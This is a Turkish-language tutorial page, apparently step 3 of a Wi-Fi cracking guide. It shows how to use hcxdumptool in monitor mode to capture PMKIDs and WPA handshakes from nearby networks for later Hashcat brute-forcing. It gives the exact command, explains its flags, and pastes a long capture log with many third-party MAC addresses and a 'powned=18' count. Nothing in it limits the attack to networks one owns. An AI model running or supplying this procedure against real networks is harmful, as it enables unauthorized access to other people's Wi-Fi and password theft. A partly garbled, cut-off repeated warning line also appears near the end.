Get Mystery Box with random crypto!

Aşama 3 Yerel Ağlardan PMKID'leri Yakalamak için Hxcdump Kull | 🔰 VİP BİLGİ 🔰

Aşama 3

Yerel Ağlardan PMKID'leri Yakalamak için Hxcdump Kullanın

Artık saldırmayı denemek istediğimiz cihazların PMKID'lerini yakalamaya hazırız. Kablosuz ağ bağdaştırıcımız "wlan1mon" olarak monitör modundayken saldırıyı başlatmak için aşağıdaki komutu uygulayacağız.

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1

Bunu parçalara ayırarak, -i programa hangi arayüzü kullandığımızı söyler, bu durumda wlan1mon. Sonuçları kaydedeceğimiz dosya adı -o bayrak bağımsız değişkeni ile belirtilebilir. Taramak istediğimiz kanal, -c işareti ve ardından taranacak kanalın numarası ile belirtilebilir.


Yukarıdaki komutumuzda, yakalanan PMKID'leri "galleria.pcapng" adlı bir dosyaya kaydetmek için wlan1mon kullanıyoruz. Başka bir durum değeri belirtebilseniz de 1 dışında herhangi bir değerle yakalamayı başaramadım

warning: NetworkManager is running with pid 555 warning: wpa_supplicant is running with pid 611 warning: wlan1mon is probably a monitor interface start capturing (stop with ctrl+c) INTERFACE:...............: wlan1mon FILTERLIST...............: 0 entries MAC CLIENT...............: fcc233ca8bc5 MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 62439 ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956 [22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID] [22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696] [22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247] [22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832] [22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID] [22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202] INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

Uyarı: NetworkManager pid 555 ile çalışıyor uyarı: wpa_supplicant pid 611 ile çalışıyor uyarı: wlan1mon muhtemelen yakalamaya başlayan bir monitör arayüzüdür (
Yeterince topladığınızda, saldırıyı sonlandırmak için Control-C yazarak programı durdurabilirsiniz. Bu, kaba kuvvet saldırısı girişiminde bulunmamız için gereken bilgileri içeren bir PCAPNG dosyası üretmelidir, ancak bunu Hashcat'in anlayabileceği bir biçime dönüştürmemiz gerekecek